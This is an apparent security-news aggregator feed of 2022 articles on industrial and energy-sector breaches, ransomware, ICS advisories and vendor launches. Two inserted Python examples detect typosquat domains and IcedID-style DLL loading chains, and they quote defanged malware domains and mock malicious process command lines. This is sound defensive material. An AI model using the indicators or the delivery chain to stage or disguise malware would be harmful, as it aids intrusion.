      Cybersecurity researchers have disclosed details of now-patched flaws in Zendesk Explore that could have been exploited by an attacker to gain unauthorized access to information from customer accounts that have the feature turned on. "Before it was patched, the flaw would have allowed threat actors to access conversations, email addresses, tickets, comments, and other information from Zendesk "

      Autosummary: "


      Key cybersecurity trends in the energy sector

      industry ciber
      2022-11-14 https://www.helpnetsecurity.com/2022/11/14/energy-sector-cybersecurity-trends-video/

      The key trends for the energy industry are about how we manage the future supply and demand challenges at a much more granular level than we are currently able to do. If we’re ever to balance the supply and demand equation against the backdrop of increased consumer demands (electric vehicles, mass transport systems, electrification of home heating systems, etc.), and the increased complexity in the generation, distribution and storage systems, this supply and demand will have … More

      The post Key cybersecurity trends in the energy sector appeared first on Help Net Security.

      "

      Autosummary: "


      High-Severity Flaw Reported in Critical System Used by Oil and Gas Companies

      industry
      2022-11-10 https://thehackernews.com/2022/11/high-severity-flaw-reported-in-critical.html
      Cybersecurity researchers have disclosed details of a new vulnerability in a system used across oil and gas organizations that could be exploited by an attacker to inject and execute arbitrary code. The vulnerability, tracked as CVE-2022-0902 (CVSS score: 8.1), is a path-traversal vulnerability in ABB Totalflow flow computers and remote controllers. "Attackers can exploit this flaw to gain root "

      Autosummary: "


      A bug in ABB Totalflow flow computers exposed oil and gas companies to attack

      exploits industry
      2022-11-10 https://securityaffairs.co/wordpress/138331/security/abb-totalflow-flaw.html

      A flaw in the ABB Totalflow system used in oil and gas organizations could be exploited by an attacker to inject and execute arbitrary code. Researchers from industrial security firm Claroty disclosed details of a vulnerability affecting ABB Totalflow flow computers and remote controllers. Flow computers are used to calculate volume and flow rates for oil […]

      The post A bug in ABB Totalflow flow computers exposed oil and gas companies to attack appeared first on Security Affairs.

      "

      Autosummary: "


      How geopolitical turmoil changed the cybersecurity threat landscape

      industry ciber
      2022-11-08 https://www.helpnetsecurity.com/2022/11/08/cybersecurity-threat-landscape-2022/

      ENISA, EU’s Agency for Cybersecurity, released its annual Threat Landscape report, covering the period from July 2021 up to July 2022. Cybersecurity threat landscape in 2022: With more than 10 terabytes of data stolen monthly, ransomware still fares as one of the prime threats in the new report, with phishing now identified as the most common initial vector of such attacks. The other threats to rank highest alongside ransomware are attacks against availability, also called … More

      The post How geopolitical turmoil changed the cybersecurity threat landscape appeared first on Help Net Security.

      "

      Autosummary: Ransomware: 60% of affected organizations may have paid ransom demands. Malware: 66 disclosures of zero-day vulnerabilities observed in 2021. Social engineering: Phishing remains a popular technique but we see new forms of phishing arising such as spear-phishing, whaling, smishing and vishing. Threats against data: Increasing proportionally to the total of data produced. Disinformation – misinformation: Escalating AI-enabled disinformation, deepfakes and disinformation-as-a-service. Supply chain targeting: Third-party incidents account for 17% of the intrusions in 2021 compared to less than 1% in 2020. Threats against availability: Largest denial of service (DDoS) attack ever was launched in Europe in July 2022; Internet: destruction of infrastructure, outages and rerouting of internet traffic. "


      Abusing Microsoft Dynamics 365 Customer Voice in phishing attacks

      financial industry
      2022-11-07 https://securityaffairs.co/wordpress/138147/cyber-crime/microsoft-dynamics-365-customer-voice-phishing.html

      Researchers uncovered a campaign abusing Microsoft Dynamics 365 customer voice to steal credentials from the victims. Microsoft’s Dynamics 365 Customer Voice product allows organizations to gain customer feedback, it is used to conduct customer satisfaction surveys. Researchers from cybersecurity firm Avanan, uncovered a campaign abusing Microsoft Dynamics 365 customer voice to steal credentials from the […]

      The post Abusing Microsoft Dynamics 365 Customer Voice in phishing attacks appeared first on Security Affairs.

      "

      Autosummary: Below are the suggestions provided by the experts: always hover over all URLs, even those not in the email body; when receiving an email with a voicemail, ensure this is a typical type of email received before thinking of engaging; if ever unsure about an email, ask the original sender. "


      CISA Warns of Critical Vulnerabilities in 3 Industrial Control System Software

      industry
      2022-11-04 https://thehackernews.com/2022/11/cisa-warns-of-critical-vulnerabilities.html
      The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published three Industrial Control Systems (ICS) advisories about multiple vulnerabilities in software from ETIC Telecom, Nokia, and Delta Industrial Automation. Prominent among them is a set of three flaws affecting ETIC Telecom's Remote Access Server (RAS), which "could allow an attacker to obtain sensitive information and "

      Autosummary: "


      Attackers leverage Microsoft Dynamics 365 to phish users

      industry
      2022-11-04 https://www.helpnetsecurity.com/2022/11/04/microsoft-dynamics-365-phishing/

      Attackers are abusing Microsoft Dynamics 365 Customer Voice to evade email filters and deliver phishing emails into Microsoft users’ inboxes, Avanan researchers are warning. The attack: Microsoft Dynamics 365 is a suite of enterprise resource planning (ERP) and customer relationship management (CRM) applications. Customer Voice is one of these applications, and it’s used for collecting data and feedback from customers via surveys, phone calls, etc. The attackers have created Microsoft Dynamics 365 Customer Voice accounts … More

      The post Attackers leverage Microsoft Dynamics 365 to phish users appeared first on Help Net Security.

      "

      Autosummary: Similarly, phishers have been known to exploit Facebook Ads, QuickBooks, Lucidchart, Adobe Cloud, and many other legitimate services. "


      IoT cybersecurity is slowly gaining mainstream attention

      industry ciber
      2022-11-03 https://www.helpnetsecurity.com/2022/11/03/iot-devices-cybersecurity/

      In this interview for Help Net Security, Jason Oberg, CTO at Cycuity, talks about IoT device cybersecurity, from production to usage, and how far we have come in securing these devices. IoT has been part of our reality for quite some time, but what about the security of these devices? Is it becoming a priority? We’ve seen the concern and prioritization of IoT security growing; this is due both to the growing popularity of these … More

      The post IoT cybersecurity is slowly gaining mainstream attention appeared first on Help Net Security.

      "

      Autosummary: In this interview for Help Net Security, Jason Oberg, CTO at Cycuity, talks about IoT device cybersecurity, from production to usage, and how far we have come in securing these devices. That said, we see a shift to making security a key component of the entire development process so that the approach is systematic, predictable, and scalable with the usual development schedule. "


      Verified users beware! Scammers are exploiting Twitter turmoil caused by Elon Musk’s takeover

      financial exploits industry
      2022-11-03 https://www.tripwire.com/state-of-security/verified-users-beware-scammers-are-exploiting-twitter-turmoil-caused-elon-musks
      The world's richest man's plans for the news junkie's favourite social network inevitably get a great deal of attention. Not everyone will be aware of the details of what Elon Musk might be planning for Twitter, but they will certainly be aware that it's a hot topic. And so if a Twitter user receives a message claiming to be about their verified account, they may very well believe it... and that makes them more susceptible to falling into a trap. Read more in my article on the Tripwire State of Security blog. "

      Autosummary: The emails warn users that their "Verified" status - a coveted blue and white tick badge displayed alongside their name - will have to be paid for on a monthly basis, unless they can "fully verify [they are] famous or well-known. "


      LockBit ransomware claims attack on Continental automotive giant

      exploits ransomware industry
      2022-11-03 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-claims-attack-on-continental-automotive-giant/
      The LockBit ransomware gang has claimed responsibility for a cyberattack against the German multinational automotive group Continental. [...] "

      Autosummary: Continental entry on LockBit's data leak site (BleepingComputer). Breached in an August cyberattack: Continental's VP of Communications & Marketing, Kathryn Blackwell, didn't confirm LockBit's claims and would not share any details regarding the attack when BleepingComputer reached out but, instead, linked to a press release from August 24 regarding a cyberattack that led to a breach of Continental's systems. "


      LockBit ransomware gang claims the hack of Continental automotive group

      exploits ransomware industry
      2022-11-03 https://securityaffairs.co/wordpress/138062/cyber-crime/lockbit-gang-claims-continental-hack.html

      The LockBit ransomware group claimed to have hacked the multinational automotive group Continental and threatens to leak stolen data. The LockBit ransomware gang announced that it has hacked the German multinational automotive parts manufacturing company Continental. The group added the name of the company to its Tor leak site and is threatening to publish alleged stolen data if the […]

      The post LockBit ransomware gang claims the hack of Continental automotive group appeared first on Security Affairs.

      "

      Autosummary: "


      Extortion fears after hacker stole patient files from Dutch mental health clinics

      industry
      2022-10-31 https://www.bitdefender.com/blog/hotforsecurity/extortion-fears-after-hacker-stole-patient-files-from-dutch-mental-health-clinics/
      Patients of Dutch mental health clinics are being warned that their personal records have fallen into the hands of hackers following a security breach at an online portal that "guaranteed" their privacy. Read more in my article on the Hot for Security blog. "

      Autosummary: "


      BlackByte ransomware group hit Asahi Group Holdings, a precision metal manufacturing and metal solution provider

      exploits industry
      2022-10-30 https://securityaffairs.co/wordpress/137803/cyber-crime/blackbyte-ransomware-asahi-group-holdings.html

      The BlackByte ransomware group claims to have compromised Asahi Group Holdings, a precision metal manufacturing and metal solution provider. Asahi Group Holdings, Ltd. is a precision metal manufacturing and metal solution provider. For more than 40 years, the company has been delivering end-to-end services in the industries of precision metals and thin-film coatings with different teams […]

      The post BlackByte ransomware group hit Asahi Group Holdings, a precision metal manufacturing and metal solution provider appeared first on Security Affairs.

      "

      Autosummary: "


      Elektrobit and Canonical join forces to build the next generation of automotive software

      industry
      2022-10-29 https://www.helpnetsecurity.com/2022/10/30/elektrobit-canonical/

      Elektrobit and Canonical have partnered to bring the benefits of Canonical’s Ubuntu operating system to automotive software. As the industry transitions towards software-defined vehicles, the new partnership will make it easier than ever before for car makers, suppliers, and developers to create the next generation of vehicle applications, while meeting stringent automotive standards. Combining Canonical’s open-source Linux operating system with Elektrobit’s expertise in automotive-grade embedded software will enable long-term maintenance, over-the-air updates and functional vehicle … More

      The post Elektrobit and Canonical join forces to build the next generation of automotive software appeared first on Help Net Security.

      "

      Autosummary: "


      Open Systems MDR+ IoT secures IoT and OT devices alongside IT infrastructure

      industry
      2022-10-27 https://www.helpnetsecurity.com/2022/10/27/open-systems-mdr-iot/

      Open Systems has launched MDR+ IoT, which extends the 24×7 security monitoring of its MDR+ to protect connected devices used in Internet of Things (IoT) and Operational Technology (OT) applications. By adding IoT and OT telemetry to MDR+, customers benefit from 24×7 detection and response that correlates alerts across their IoT, OT and IT environments for maximum visibility and protection as part of a holistic security program. Corporate adoption of IoT and OT devices has … More

      The post Open Systems MDR+ IoT secures IoT and OT devices alongside IT infrastructure appeared first on Help Net Security.

      "

      Autosummary: “Combining the strength of Open Systems’ MDR+, our next generation MDR service, together with Defender for IoT allows us to minimize the threat surface across our clients’ entire infrastructures, using the same best practices, rigor and workflow that helped Open Systems win Microsoft’s Security MSSP of the Year for 2022,” Corn added. "


      Perygee raises $4.75 million to secure most vulnerable IoT and OT devices

      industry
      2022-10-26 https://www.helpnetsecurity.com/2022/10/27/perygee-funding/

      Perygee has closed a $4.75 million seed investment led by Ballistic Ventures. The round also includes investment from cybersecurity angels Ray Rothrock, John Donovan, Ohad Finkelstein, Corey Thomas, and Bryson Bort, as well as BBG Ventures, which backs early-stage startups with female founders. To date, Perygee has raised $6.35 million in funding. Internet of Things (IoT) and Operational Technology (OT) devices are critical aspects of the supply chain, from manufacturing plants to utilities to hospitals … More

      The post Perygee raises $4.75 million to secure most vulnerable IoT and OT devices appeared first on Help Net Security.

      "

      Autosummary: “Effectively managing several OT systems requires an intelligent solution to handle the complex data challenges,” said Andrew Schaefer, Vice President and CTO of EnVen Energy Corp. “With Perygee, we can quickly provide structure to our data, easily parse and share relevant information with different stakeholders, and automate the maintenance of our data to maintain our security posture over time,” Schaefer continued. The round also includes investment from cybersecurity angels Ray Rothrock, John Donovan, Ohad Finkelstein, Corey Thomas, and Bryson Bort, as well as BBG Ventures, which backs early-stage startups with female founders. "


      Hive Ransomware Hackers Begin Leaking Data Stolen from Tata Power Energy Company

      exploits ransomware industry
      2022-10-25 https://thehackernews.com/2022/10/hive-ransomware-hackers-begin-leaking.html
      The Hive ransomware-as-a-service (RaaS) group has claimed responsibility for a cyber attack against Tata Power that was disclosed by the company less than two weeks ago. The incident is said to have occurred on October 3, 2022. The threat actor has also been observed leaking stolen data exfiltrated prior to encrypting the network as part of its double extortion scheme. This allegedly comprises "

      Autosummary: "


      Asset risk management: Getting the basics right

      industry
      2022-10-24 https://www.helpnetsecurity.com/2022/10/24/asset-risk-management-challenges/

      In this interview with Help Net Security, Yossi Appleboum, CEO at Sepio, talks about asset risk management challenges for different industries and where it’s heading. Cyberattacks show no signs of slowing down. What do organizations need to do to boost their asset risk management? They need to understand what’s in their environment. You can’t do anything to manage risk if you don’t know what assets you have and their associated risk posture. Increased spending on … More

      The post Asset risk management: Getting the basics right appeared first on Help Net Security.

      "

      Autosummary: So, yes, the asset risk factor will reach new heights because it is an integral part of asset management and, in turn, cybersecurity. In the world of cybersecurity, asset management is, at its core, the understanding of IT assets in an entity’s environment. In this interview with Help Net Security, Yossi Appleboum, CEO at Sepio, talks about asset risk management challenges for different industries and where it’s heading. "


      Norway PM warns of Russia cyber threat to oil and gas industry

      industry
      2022-10-24 https://securityaffairs.co/wordpress/137561/cyber-warfare-2/norway-pm-warns-russia-threat.html

      Norway’s prime minister Jonas Gahr Støre warned last week that Russia poses “a real and serious threat” to the country’s oil and gas industry. The prime minister said his country has been slow in adopting […]

      The post Norway PM warns of Russia cyber threat to oil and gas industry appeared first on Security Affairs.

      "

      Autosummary: "


      Iran’s atomic energy agency confirms hack after stolen data leaked online

      industry
      2022-10-24 https://www.bleepingcomputer.com/news/security/iran-s-atomic-energy-agency-confirms-hack-after-stolen-data-leaked-online/
      The Iranian Atomic Energy Organization (AEOI) has confirmed that one of its subsidiaries' email servers was hacked after the "Black Reward" hacking group published stolen data online. [...] "

      Autosummary: "


      Typosquat campaign mimics 27 brands to push Windows, Android malware

      exploits industry
      2022-10-23 https://www.bleepingcomputer.com/news/security/typosquat-campaign-mimics-27-brands-to-push-windows-android-malware/
      A massive, malicious campaign is underway using over 200 typosquatting domains that impersonate twenty-seven brands to trick visitors into downloading various Windows and Android malware. [...] "

      Autosummary: (Image: malicious site impersonating PayPal) Some of the domains used for this purpose are:
      • payce-google[.]com – impersonates Google Wallet
      • snanpckat-apk[.]com – impersonates Snapchat
      • vidmates-app[.]com – impersonates VidMate
      • paltpal-apk[.]com – impersonates PayPal
      • m-apkpures[.]com – impersonates APKPure
      • tlktok-apk[.]link – impersonates the download portal for the TikTok app
      In all these cases, the malware delivered to users attempting to download the APKs is ERMAC, an Android banking trojan that targets credentials for 467 banking and cryptocurrency-wallet apps. "
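The domains above share one shape: a brand name with a character or two changed, padded with a lure token such as -apk or -app so the result looks like a download portal. That shape can be scored mechanically. The following Python is an added example written for this page, not code from the article or from the researchers it cites. It refangs the `[.]` notation, strips lure tokens from the leftmost label, and measures optimal string alignment distance (Damerau-Levenshtein with adjacent transpositions) against a brand list; the brand list, the lure-token set, the small legitimate-domain set and the two control domains are assumptions, and the registrable-domain split (last two labels) is a simplification that a real deployment would replace with the Public Suffix List.

```python
"""Score candidate domains against a brand list for typosquatting.

Added example, not part of the article or its source research. The brand list,
the lure tokens, the legitimate-domain set and the control domains below are
constructed for illustration.
"""
import re

# Brand labels the campaign impersonated (assumption: matched on the bare label).
BRANDS = ["google", "snapchat", "vidmate", "paypal", "apkpure", "tiktok"]

# Tokens squatters bolt onto a brand to look like a download portal (assumption).
LURE_TOKENS = {"apk", "apks", "app", "apps", "m", "www", "download", "mobile"}

# The brands' own registrable domains; exact matches here are not squats (assumption).
LEGITIMATE = {"google.com", "snapchat.com", "vidmate.net", "paypal.com",
              "apkpure.com", "tiktok.com"}


def refang(domain):
    """Turn defanged notation such as example[.]com back into example.com."""
    return re.sub(r"\[\.\]", ".", domain.strip().lower())


def registrable_domain(host):
    """Naive eTLD+1: the last two labels. Use the Public Suffix List in production."""
    return ".".join(host.split(".")[-2:])


def osa_distance(a, b):
    """Optimal string alignment (restricted Damerau-Levenshtein) distance:
    insertions, deletions, substitutions and adjacent transpositions cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def candidate_labels(host):
    """Split the leftmost label on '-' and drop lure tokens, so that
    'snanpckat-apk' yields {'snanpckat'} and 'payce-google' yields
    {'payce', 'google', 'paycegoogle'}."""
    tokens = [t for t in host.split(".")[0].split("-") if t and t not in LURE_TOKENS]
    return set(tokens) | {"".join(tokens)}


def match_brand(domain, brands=BRANDS, max_distance=2):
    """Return (brand, distance, label) for the closest brand within
    max_distance, or None if the domain is legitimate or not close to any brand."""
    host = refang(domain)
    if registrable_domain(host) in LEGITIMATE:
        return None
    best = None
    for label in candidate_labels(host):
        for brand in brands:
            dist = osa_distance(label, brand)
            if dist <= max_distance and (best is None or dist < best[1]):
                best = (brand, dist, label)
    return best


# The six domains quoted in the article, plus two constructed controls.
SAMPLES = ["payce-google[.]com", "snanpckat-apk[.]com", "vidmates-app[.]com",
           "paltpal-apk[.]com", "m-apkpures[.]com", "tlktok-apk[.]link",
           "paypal[.]com", "securityaffairs[.]co"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample:24} -> {match_brand(sample)}")
```

A distance of 0 (payce-google) means the brand label appears verbatim inside a domain the brand does not own, which is as much a squat as a misspelling; the threshold of 2 is generous and, run over a full newly-registered-domain feed, will need a denylist of common dictionary words that sit within two edits of short brand names.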


      Hackers stole sensitive data from Iran’s atomic energy agency

      industry
      2022-10-23 https://securityaffairs.co/wordpress/137513/hacking/hackers-stole-sensitive-data-from-irans-atomic-energy-agency.html

      Iran’s atomic energy agency claims that alleged state-sponsored hackers have compromised its email system. Iran’s atomic energy agency revealed on Sunday that a nation-state actor had access to a subsidiary’s network and free access to its email system, the Associated Press reports. The Iranian government has yet to attribute the attack to a specific The […]

      The post Hackers stole sensitive data from Iran’s atomic energy agency appeared first on Security Affairs.

      "

      Autosummary: The Iranian government has yet to attribute the attack to a specific group. The hacker group, which calls itself Black Reward, announced the hack of the Atomic Energy Organization on Telegram and shared files of contracts, construction plans, and details about equipment at the Bushehr plant as proof of the intrusion. "


      MetricStream Euphrates enables enterprises to improve their GRC program performance

      industry
      2022-10-21 https://www.helpnetsecurity.com/2022/10/21/metricstream-euphrates/

      MetricStream has unveiled its latest product release, focused on accelerating GRC program performance. The purpose-built low-code/no-code platform empowers customers to easily personalize and configure products to their needs. New APIs help connect MetricStream with external systems and enrich GRC insights to accelerate decision making. “Today’s CXOs are under heavy pressure to balance a plethora of threats, ensure business resilience, and reduce costs,” said Prasad Sabbineni, Co-CEO, MetricStream. “It’s our belief that we can help them … More

      The post MetricStream Euphrates enables enterprises to improve their GRC program performance appeared first on Help Net Security.

      "

      Autosummary: "


      EnergyAustralia Electricity company discloses security breach

      government industry
      2022-10-21 https://securityaffairs.co/wordpress/137473/data-breach/energyaustralia-data-breach.html

      Electricity company EnergyAustralia has disclosed a security breach in which threat actors accessed information on 323 customers. Another Australian organization has been hit by a cyber attack; this time the victim is EnergyAustralia, the country’s third-largest energy retailer. The company confirmed that threat actors had access to information on 323 residential and […]

      The post EnergyAustralia Electricity company discloses security breach appeared first on Security Affairs.

      "

      Autosummary: According to a statement released on Friday, the compromised data were stored on the company’s online platform, My Account, and included customer names, addresses, email addresses, electricity and gas bills, phone numbers, and the first six and last three digits of their credit cards. "


      Mandiant Breach Analytics empowers enterprises to gain insight on breach activity in IT environments

      industry
      2022-10-19 https://www.helpnetsecurity.com/2022/10/19/mandiant-breach-analytics/

      Mandiant released Mandiant Breach Analytics for Google Cloud’s Chronicle. Mandiant Breach Analytics combines Mandiant’s threat intelligence with the power of the Google Cloud Chronicle Security Operations suite to help organizations improve security effectiveness and reduce business risk. Threat actors continue to escalate the sophistication and aggressiveness of their attacks, targeting businesses of all sizes and across all industries. With global median dwell time—defined as the duration between the start of a cyber intrusion and when … More

      The post Mandiant Breach Analytics empowers enterprises to gain insight on breach activity in IT environments appeared first on Help Net Security.

      "

      Autosummary: Mandiant Breach Analytics can empower organizations to: Strengthen cyber defense posture : Fueled by the Mandiant Intel Grid, Breach Analytics leverages up-to-the-moment breach intelligence and expertise gleaned from Mandiant’s world-class incident responders, analysts and threat hunters, enabling organizations to put that intelligence into action without timely and costly security engineering. "


      CISA Warns of Critical Flaws Affecting Industrial Appliances from Advantech and Hitachi

      industry
      2022-10-19 https://thehackernews.com/2022/10/cisa-warns-of-critical-flaws-affecting.html
      The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released two Industrial Control Systems (ICS) advisories pertaining to severe flaws in Advantech R-SeeNet and Hitachi Energy APM Edge appliances. This consists of three weaknesses in the R-SeeNet monitoring solution, successful exploitation of which "could result in an unauthorized attacker remotely deleting files on the "

      Autosummary: "


      Rockwell Automation FactoryTalk Design Hub improves development of automation projects

      industry
      2022-10-16 https://www.helpnetsecurity.com/2022/10/16/rockwell-automation-factorytalk-design-hub/

      Rockwell Automation released FactoryTalk Design Hub, enabling industrial organizations to transform their automation design capabilities with a more simplified, productive way to work powered by the cloud. Teams of all sizes, skillsets, and locations can work smarter through enhanced collaboration, improved lifecycle management, and on-demand access to cloud-based software. The result is increased design productivity, faster time to market, and systems that cost less to build and maintain. “In this new age of ‘work from … More

      The post Rockwell Automation FactoryTalk Design Hub improves development of automation projects appeared first on Help Net Security.

      "

      Autosummary: “The digital transformation of automation design capabilities requires both the cloud to maximize control system developers’ productivity, and it also requires that all software tools are connected to each other by a digital thread to maximize collaboration, scalability, and productivity,” according to Craig Resnick, vice president, ARC Advisory Group. “Rockwell Automation’s FactoryTalk Design Hub enables seamless digital thread connectivity between its design, visualization, digital twin, storage, and remote access software tools that provide control system developers with immediate on-demand access to all automation designs as needed regardless of their location, helping these companies to accelerate their initiatives ranging from digital transformation to IT/OT convergence,” Resnick added. "


      Indian Energy Company Tata Power's IT Infrastructure Hit By Cyber Attack

      industry
      2022-10-15 https://thehackernews.com/2022/10/indian-energy-company-tata-powers-it.html
      Tata Power Company Limited, India's largest integrated power company, on Friday confirmed it was targeted by a cyberattack. The intrusion on IT infrastructure impacted "some of its IT systems," the company said in a filing with the National Stock Exchange (NSE) of India. It further said it has taken steps to retrieve and restore the affected machines, adding it put in place "

      Autosummary: "


      Portnox unveils IoT fingerprinting and profiling solution to address rising IoT security threats

      industry
      2022-10-13 https://www.helpnetsecurity.com/2022/10/13/portnox-iot-security-solution/

      Portnox released a cloud-native IoT security solution to help mid-market and enterprise businesses address rising Internet of Things (IoT) security threats. Now available via the Portnox Cloud, Portnox’s new IoT fingerprinting and profiling capabilities empower organizations to identify, authenticate, authorize, and segment IoT devices across their network to ensure an effective zero trust security posture. “No organization is immune to the inherent and increasing number of security risks IoT devices pose as they are more … More

      The post Portnox unveils IoT fingerprinting and profiling solution to address rising IoT security threats appeared first on Help Net Security.

      "

      Autosummary: Large enterprises are not alone when it comes to rising IoT security headaches – organizations of all sizes are actively trying to strengthen their security postures to account for the surge of threats tied to the rising operational dependence on IoT. With so many IoT devices – printers, cameras, thermostats, sensors, monitors, etc. – now in use across all types of organizations, the ability to automatically onboard and enforce IoT device authentication, control and security policies across the network is mission critical. "


      Critical Bug in Siemens SIMATIC PLCs Could Let Attackers Steal Cryptographic Keys

      exploits industry
      2022-10-12 https://thehackernews.com/2022/10/critical-bug-in-siemens-simatic-plcs.html
      A vulnerability in Siemens Simatic programmable logic controller (PLC) can be exploited to retrieve the hard-coded, global private cryptographic keys and seize control of the devices. "An attacker can use these keys to perform multiple advanced attacks against Siemens SIMATIC devices and the related TIA Portal, while bypassing all four of its access level protections," industrial cybersecurity "

      Autosummary: "


      BazarCall Callback Phishing Attacks Constantly Evolving Its Social Engineering Tactics

      financial industry
      2022-10-11 https://thehackernews.com/2022/10/bazarcall-callback-phishing-attacks.html
      The operators behind the BazaCall call back phishing method have continued to evolve with updated social engineering tactics to deploy malware on targeted networks. The scheme eventually acts as an entry point to conduct financial fraud or the delivery of next-stage payloads such as ransomware, cybersecurity company Trellix said in a report published last week. Primary targets of the latest "

      Autosummary: "


      Cyware hires three industry experts to increase its marketing programs

      industry
      2022-10-11 https://www.helpnetsecurity.com/2022/10/12/cyware-marketing-leadership-team/

      Cyware has appointed Willy Leichter as Vice President of Marketing, Jeff Bell as Director of Demand Generation, and Mark Bermingham as Director of Product Marketing. In their new roles, Willy, Jeff, and Mark will expand the company’s marketing capabilities. In its quest to solve the automation, threat intelligence, and security collaboration challenges for security teams globally, Willy, Jeff, and Mark will help Cyware to grow its reach and generate demand by increasing its marketing programs. … More

      The post Cyware hires three industry experts to increase its marketing programs appeared first on Help Net Security.

      "

      Autosummary: Serving numerous large Enterprises, MSSPs, and ISACs across the globe, Cyware is poised to lead the creation of next-gen security infrastructure through its diverse all-star team, extensive partner ecosystem, loyal clientele, and industry-leading products. "


      Hackers behind IcedID malware attacks diversify delivery tactics

      exploits industry
      2022-10-10 https://www.bleepingcomputer.com/news/security/hackers-behind-icedid-malware-attacks-diversify-delivery-tactics/
      The threat actors behind IcedID malware phishing campaigns are utilizing a wide variety of distribution methods, likely to determine what works best against different targets. [...] "

      Autosummary: Diversifying the delivery chain: between September 13 and 21, Team Cymru analysts observed the following IcedID delivery methods against targets:
      • Password-protected ZIP -> ISO -> LNK -> JS -> [CMD or BAT] -> DLL
      • Password-protected ZIP -> ISO -> CHM -> DLL
      • Password-protected ZIP -> ISO -> LNK -> BAT -> DLL
      • Malicious Word or Excel documents laced with macros
      • Delivered directly via the PrivateLoader pay-per-install service
      These campaigns used either Italian- or English-language lures, with the Italian ones having smaller-scale success than the English ones. "
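Every chain above ends the same way: a user-launched container (ISO, CHM, or an Office document) spawns a script or shell host that finally hands a DLL to rundll32.exe or regsvr32.exe. That shape can be matched in process-creation telemetry (Sysmon event ID 1 or an EDR equivalent) without knowing the particular lure or file names. The following Python is an added example written for this page, not code from the article or from Team Cymru. The process events are constructed and mimic the pid, parent pid, image and command-line fields of a process-create record; the script-host and trusted-directory lists are assumptions, and a real rule would also correlate the mounted-ISO volume letter, which is omitted here.

```python
"""Flag DLL loads that sit at the end of a user-launched script/shell chain.

Added example, not part of the article or Team Cymru's research. The process
events below are constructed; the host and trusted-directory lists are
assumptions chosen to cover the chains the article lists.
"""
import re

# Intermediate hosts that the LNK/JS/CHM/macro stages run in (assumption).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe",
                "hh.exe", "mshta.exe", "winword.exe", "excel.exe"}

# The final stage in every chain quoted by the article: a DLL loader.
LOADERS = {"rundll32.exe", "regsvr32.exe"}

# DLLs under these roots are treated as trusted for this example (assumption).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# First drive-letter path ending in .dll on the command line, quoted or not.
DLL_RE = re.compile(r'"?([a-z]:\\[^",]+\.dll)"?', re.I)

# Constructed process-creation events: pid, ppid, image name, command line.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    # ZIP -> ISO -> LNK -> JS -> CMD -> DLL (ISO mounted as D:)
    {"pid": 200, "ppid": 100, "image": "wscript.exe",  "cmdline": 'wscript.exe "D:\\Documents.js"'},
    {"pid": 201, "ppid": 200, "image": "cmd.exe",      "cmdline": 'cmd.exe /c "D:\\run.cmd"'},
    {"pid": 202, "ppid": 201, "image": "rundll32.exe", "cmdline": "rundll32.exe D:\\lib\\core.dll,DllRegisterServer"},
    # ZIP -> ISO -> CHM -> DLL
    {"pid": 300, "ppid": 100, "image": "hh.exe",       "cmdline": 'hh.exe "D:\\readme.chm"'},
    {"pid": 301, "ppid": 300, "image": "rundll32.exe", "cmdline": "rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\x.dll,init"},
    # Office macro -> DLL
    {"pid": 400, "ppid": 100, "image": "winword.exe",  "cmdline": 'winword.exe "C:\\Users\\alice\\Downloads\\inv.docm"'},
    {"pid": 401, "ppid": 400, "image": "rundll32.exe", "cmdline": "rundll32.exe C:\\Users\\alice\\AppData\\Roaming\\up.dll,PluginInit"},
    # Benign: explorer loading a system DLL directly, no script host in between
    {"pid": 500, "ppid": 100, "image": "rundll32.exe", "cmdline": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
    # Benign: service-launched loader with no explorer ancestry
    {"pid": 600, "ppid": 4,   "image": "regsvr32.exe", "cmdline": "regsvr32.exe /s C:\\Program Files\\Vendor\\agent.dll"},
]


def lineage(procs, pid):
    """Return image names from the oldest known ancestor down to pid."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid]["image"].lower())
        pid = procs[pid]["ppid"]
    return list(reversed(chain))


def dll_argument(cmdline):
    """Lower-cased DLL path passed to the loader, or None if there is none."""
    m = DLL_RE.search(cmdline)
    return m.group(1).lower() if m else None


def suspicious_dll_loads(events):
    """Return (chain, dll) for each rundll32/regsvr32 process that loads a DLL
    from outside the trusted roots, descends from explorer.exe, and has at
    least one script or shell host between the two."""
    procs = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["image"].lower() not in LOADERS:
            continue
        dll = dll_argument(e["cmdline"])
        if dll is None or dll.startswith(TRUSTED_DIRS):
            continue
        chain = lineage(procs, e["pid"])
        if chain[0] != "explorer.exe":
            continue
        if not any(p in SCRIPT_HOSTS for p in chain[1:-1]):
            continue
        hits.append((" > ".join(chain), dll))
    return hits


if __name__ == "__main__":
    for chain, dll in suspicious_dll_loads(EVENTS):
        print(f"{chain}  loads  {dll}")
```

The rule keys on lineage rather than on file names, so it survives the operators swapping JS for BAT or CHM for LNK; what it will not catch is a loader that copies the DLL under a trusted root first, which is why the trusted-directory allowlist should be as narrow as your fleet permits.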


      Semtech’s LoRa Connect optimizes CWD Limited’s dual combo module for IoT device connectivity

      industry
      2022-10-08 https://www.helpnetsecurity.com/2022/10/08/semtech-cwd-limited/

